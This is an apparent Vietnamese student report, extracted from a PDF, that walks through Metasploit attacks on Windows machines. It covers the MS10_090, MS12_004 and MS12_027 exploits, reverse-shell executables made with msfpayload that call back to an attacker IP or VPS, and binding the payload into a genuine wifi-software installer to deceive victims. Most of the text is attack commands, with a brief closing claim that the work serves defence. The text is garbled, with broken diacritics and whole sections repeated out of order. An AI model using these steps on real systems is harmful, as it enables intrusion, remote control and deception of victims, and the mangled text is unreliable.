Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
